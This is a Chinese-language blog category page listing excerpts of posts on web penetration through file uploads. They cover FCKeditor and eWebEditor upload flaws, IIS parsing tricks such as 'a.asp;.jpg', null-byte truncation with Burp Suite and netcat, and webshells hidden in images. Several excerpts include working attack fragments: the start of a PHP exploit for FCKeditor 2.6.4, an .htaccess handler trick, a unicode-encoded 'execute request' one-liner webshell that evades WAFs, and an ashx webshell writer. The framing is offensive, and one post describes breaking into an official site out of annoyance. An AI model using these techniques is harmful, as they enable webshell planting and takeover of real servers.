文章分类 -  上传

渗透技巧——通过cmd上传文件的N种方法
摘要:http://www.secbox.cn/hacker/15536.html 阅读全文

posted @ 2017-04-22 18:32 =_=! 阅读(1338) 评论(0) 推荐(0)

过安全狗上传拦截
该文被密码保护。

posted @ 2015-04-03 23:03 =_=! 阅读(0) 评论(0) 推荐(0)

韩国某编辑器HABYeditor鸡肋漏洞!
摘要:直接写htm文件,文件名:tmpcontent.htm:直接上传htm文件:文件名:tmpcontent.htm写个htm文件到服务器你们会发现会解析的!编辑器判断方法:editor/historyeditor/licenseeditor/htmlareaeditor/samples/sample_euckr.htmeditor/samples/sample_utf8.htmeditor/filemanager/php/upload.phpeditor/filemanager/php/savecontent.phpeditor/filemanager/php/filemanager_lib.p 阅读全文

posted @ 2013-08-05 21:31 =_=! 阅读(384) 评论(0) 推荐(0)

突破php 的imagecopyresampled 和imagecopyresized 实现图片马 JPG
摘要:之前有人发布了 利用PNG 图片上述压缩函数的方法 原理利用 PNG的结构IDAT chunks填充一句话webshell,并进行一套取模运算详见:https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/但是受限于图像的尺寸 必须320×320 且必须是PNG格式那JPG怎么办神奇的老外 提出了列方法 In case of successful injection you will get a specially crafted image, which should be upl.. 阅读全文

posted @ 2013-07-29 00:35 =_=! 阅读(441) 评论(0) 推荐(0)

本地元素修改上传拿shell
摘要:进后台看看:1.有上传2.有数据库操作3.有系统设置拿shell,我有三种方法1.上传直接上传抓包爆出路径filepath,这里可以考虑NC提交,或者本地修改元素建立.asp文件夹这里我直接用googlechrome审查元素../uppics/1.asa/201211920201285298.jpg2.数据库恢复这里先直接传一张图片马,然后得到路径../uppics/201211920215665549.jpg之后进行数据库恢复后台数据库路径输入框依旧点击不了,这可以本地构造突破掉,这里还是用googlechrome修改元素干掉它恢复路径可以随便写,只要有写入权限就可以了,点击确定OK,成功, 阅读全文

posted @ 2012-11-16 23:20 =_=! 阅读(257) 评论(0) 推荐(0)

iis7.5+fck解析漏洞拿站
摘要:IIS6.0解析漏洞,可以上传a.asp;.jps或者a.asp;a.jpg或者a.asp目录下传任意格式小马,都会解析这次讲的是IIS7.5解析漏洞,http://www.site.com/fckeditor/editor/fckeditor.html上传图片,浏览,上传一个aspx的一句话木马,名字为:a.aspx.a;.a.aspx.jpg..jpg,上传后直接得到上传地址 阅读全文

posted @ 2012-11-11 20:43 =_=! 阅读(1092) 评论(0) 推荐(0)

丢掉NC,利用opera游览器上传shell
摘要:今日低调在知道区发帖求助]http://forum.daokers.com/read.php?tid=3048说后台地址,用户名和密码都有,拿不到shell。不久wbxym和ljb17就分别2种办法上传好了shell。wbxym的方法很简单就是本地上传,修改action的地址为上传页面并且在路径后面加上*.asp;或者加个.也行。就不多做介绍。ljb17的方法是抓包,利用nc上传。他这里路径有2种办法,第一个办法是和上面一样,添加*.asp;,第二种办法就是截断,直接在路径后面加*.asp空格,然后在16进制下面将20改为00.然后抓包上传。这里要切记如果文件大小有变化,一定要修改包的大小。今 阅读全文

posted @ 2012-11-05 07:10 =_=! 阅读(228) 评论(0) 推荐(0)

用Burp_suite快速处理上传截断
摘要:Burp suite 是一个安全测试框架,它整合了很多的安全工具,对于渗透的朋友来说,是不可多得的一款囊中工具包,今天笔者带领大家来解读如何通过该工具迅速处理“截断上传”的漏洞。如果对该漏洞还不熟悉,就该读下以前的黑客X档案补习下了。由于该工具是通过Java写的,所以需要安装 JDK,关于 JDK 的安装,笔者简单介绍 下。基本是傻瓜化安装,安装完成后需要简单配置下环境变量,右键 ”我的电脑”->”属 性”->”高级”->”环境变量”,在系统变量中查找 Path,然后点击编辑,把 JDK 的 bin 目 录写在 path 的最后即可。如图 1图 1通过 CMD 执行下 jav 阅读全文

posted @ 2012-09-21 18:00 =_=! 阅读(682) 评论(0) 推荐(0)

fckeditor 2.6X 0day
摘要:我讲一下。这个可以说是fckeditor 2.63 oday 。目前知道的人比较多了。也比较老了http://xxxx.com/fckeditor/editor/filemanager/connectors/test.htmlhttp://xxxx.com/fckeditor/editor/filemanager/connectors/uploadtest.html 这个两个页面,是死的关键。上传xx.asa;.jpg上传之后,路径自然出来了。马为xx.asa; 注意,后面有个;除了2.63.Fckeditor 基本上每个版本都可以这么利用。上传不严格。。也可以说是IIS G6.0的漏洞觉得经 阅读全文

posted @ 2012-08-29 21:23 =_=! 阅读(388) 评论(0) 推荐(0)

fckeditor <= 2.6.4 任意文件上传漏洞
摘要:<?error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function http_send($host, $packet){$sock = fsockopen($host, 80);while (!$sock){print "\n[-] No response from {$host}:80 Trying a 阅读全文

posted @ 2012-01-06 08:54 =_=! 阅读(2625) 评论(1) 推荐(0)

解决Fckeditor删除所有上传页面如何上传入侵
摘要:好久没有脚本入侵了,今天因为参加了一个比赛,然后证书居然需要钱来买的,就很不爽,百度了下其官方网,进行了一次安检,结果是没有成功,因为iis的文件解析漏洞补上了,不过学到了一些Fckeditor在没有上传页面的情况下的入侵方式。首先,你得确定下Fckeditor的版本。 /FCKeditor/editor/dialog/fck_about.html其次,你确定下以下几个上传页面是否真的被删除了呢? /FCKeditor/editor/filemanager/browser/default/browser.html /FCKeditor/editor/filemanager/browser/d. 阅读全文

posted @ 2011-12-30 09:18 =_=! 阅读(835) 评论(0) 推荐(0)

突破本地验证继续上传
摘要:一、前言Web应用程序的编写,在满足其功能的同时却鲜有人关注其安全性,从市场上推出的各类Web应用防火墙不难理解,Web应用程序主要面临哪些安全威胁呢?如Sql注入、网页木马、表单绕过、跨站脚本、Xpath注入、口令爆力破解、客户端伪造请求…等,而其漏洞根源在于开发者完全没有安全意识到而导致的。而本文将和大家讨论本地验证的缺陷,本地验证的最大的优点应该是减轻服务器端的计算负荷,而其带来的安全胁威却足以令服务器沦陷为肉机。二、突破本地验证本地验证的方法,一般是使用javaScript脚本简单验证,比如上传格式的验证,输入内容长度的验证,如果服务器端也不进行二次验证的话,易导致恶意攻击者只需在本地 阅读全文

posted @ 2011-11-30 15:31 =_=! 阅读(691) 评论(0) 推荐(0)

突破防篡改 继续上传
摘要:继SQL注入盛行,许多网站首页招致恶意的篡改,人们迫切的需要一款解决网页防篡改问题的方案,许多公司相续推出了硬件和软件,比如文中提到的IGuard防篡改系统,防篡改的原理一般基于三种,分别是外挂轮询技术、核心内嵌技术、事件触发技术。外挂轮询技术是利用一个网页检测程序,以轮询方式读出要监控的网页,与真实网页相比较,来判断网页内容的完整性,对于被篡改的网页进行报警和实时恢复。核心内嵌技术是将篡改检测模块嵌在Web服务器软件里,它在每一个网页流出时都进行完整性检查,对于篡改网页进行实时访问阻断,并予以报警和恢复。事件触发技术是利用操作系统的文件系统接口,在网页文件的被修改时进行合法性检查,对于非法操 阅读全文

posted @ 2011-09-30 10:31 =_=! 阅读(413) 评论(0) 推荐(0)

FCKeditor所有版本任意文件上传缺陷
摘要:In The Name Of GOD[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability[+] Date: 2011[+] script:http://sourceforge.net/projects/fckeditor/[+] Author: pentesters.ir[+] Website : WwW.PenTesters.IR利用步骤:1.创建一个htaccess文件:代码内容:<FilesMatch “_php.gif”>SetHandler application/x-httpd-php&l 阅读全文

posted @ 2011-09-04 08:33 =_=! 阅读(714) 评论(0) 推荐(0)

fckeditor上传.变_突破
摘要:有很多已经修补过的fckeditor 我们上传 x.asp;y.jpg的时候 通常会变成 x_asp;y.jpg 让我们的马失效利用二次上传 可以 生成 x(2).asp;y.jpg 可以突破 有些时候打了补丁的 让我们还是无法突破 通常 我们在editor/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.cnblogs.com/connectors/asp/connector.asp新建 一个x.asp的文件夹 可饶过, 但有些变态的 程序 会将我们建立 阅读全文

posted @ 2011-09-04 07:41 =_=! 阅读(263) 评论(0) 推荐(0)

文件上传字符截断与NC提交技巧
摘要:上传文件一般是upload.asp,upfile.asp,一般可以定义文件路径,也就是uppath,而一般程序会判定后缀的,比如限定不能等于asp,aspx,asa,那么可以传cdx、cer或php(服务器支持),或者判定只能是.jpg,.gif,那么就必须使用截断方式来处理了,这儿详细说明一下。具体过程细节为:1.正常提交图片上传(最好是简单的一句话木马)2.抓包,将刚才的包抓下来,拷贝post数据出来,存成txt3.编辑包,用十进制工具编辑,增加00。4.重新提交包,nc(netcat)最原始了,也最有效。对于路径截断,主要在文件名还有路径那两种可能,下面来试试,这儿参考动网的上传漏洞与某 阅读全文

posted @ 2011-07-03 11:35 =_=! 阅读(584) 评论(0) 推荐(0)

新方法突破上传限制
摘要:下午,朋友丢来一个后台,说搞不定,要拿个SHELL。偶进去翻了一下,没发现太多利用的地方,就一个添加文章和上传图片的地方。添加文章直接生成一个ASPX文件,但不知道哪些东西可以写进去,没源码,随便试了下,插了几个代码都没成功,估计不是有过滤就是直接写进库了,于是放弃这条路。来看看上传,上传一个正常的图片可以直接上传,ASP马无论改名与否都直接报错。看来是检查是不是图片了,这个好办,直接写了个一句话马,找了张正常图片,Copy /b 1.jpg+2.asp 3.asp www.t00ls.net; t3 Q0 q% u; g& q# Y2 `成功上传,但结果用客户端连接却不成功,不晓得程 阅读全文

posted @ 2011-07-02 17:10 =_=! 阅读(1032) 评论(0) 推荐(0)

利用ashx脚本写入脚本文件拿webshell
摘要:刚在逛黑客笔记(http://hacknote.com/)的时候看到了一个很不错的上传突破,顺便发过来给大家分享下,该方法是利用在一些比较BT的上传上面,原文内容是写在ewebeditor过滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型,上传一个ashx脚本上去,脚本内容如下:<%@ WebHandler Language="C#" class="Handler" %>using System;using System.Web;using System.IO;public class Handle 阅读全文

posted @ 2011-05-22 12:48 =_=! 阅读(1178) 评论(0) 推荐(0)

unicode变形一句话突破web防火墙过滤
摘要:现在有不少服务器加了web的防火墙,用来过滤含asp/jsp/php的网马代码,全部用空格替换,比较讨厌,不过后来刚好想到以前的一句话时候的unicode编码,那就也搞一个吧。1.新建一个mdb2.建表,考入:┼攠數畣整爠煥敵瑳∨≡┩> nbsp;(实际是<% execute request(“a”)%>)3.改后缀为asp/asa4.上传5.一句话客户端或者菜刀连接 阅读全文

posted @ 2011-05-22 11:33 =_=! 阅读(265) 评论(0) 推荐(0)

看看我是如何突破一流监控上传小马
摘要:今 看了一个站。 有上传漏洞 。但是悲剧的是。 怎么传。都是显示空白。 经验告诉我。 我遇到了一流监控系统 。判断文件里是不是存在非法字符。 非法字符也就是它自身设置好的关键词。 一般都是 web 大马等上面的关键词。只要存在。 直接把整个文件过滤成空白。 也就是今我遇到是一样的。上传测试。发现。他不仅仅过滤一般的大马关键词、一句话的关键 函数。 = =|||他竟然直接判断是否存在 <%%> 这是所有asp都存在的 = =!! 需要传能解析的 asp.怎么能少了 <%%>呢?如何突破呢? 我翻我的一句话的时候看到了一个东西。如下:<script language= 阅读全文

posted @ 2011-05-22 11:30 =_=! 阅读(236) 评论(0) 推荐(0)

导航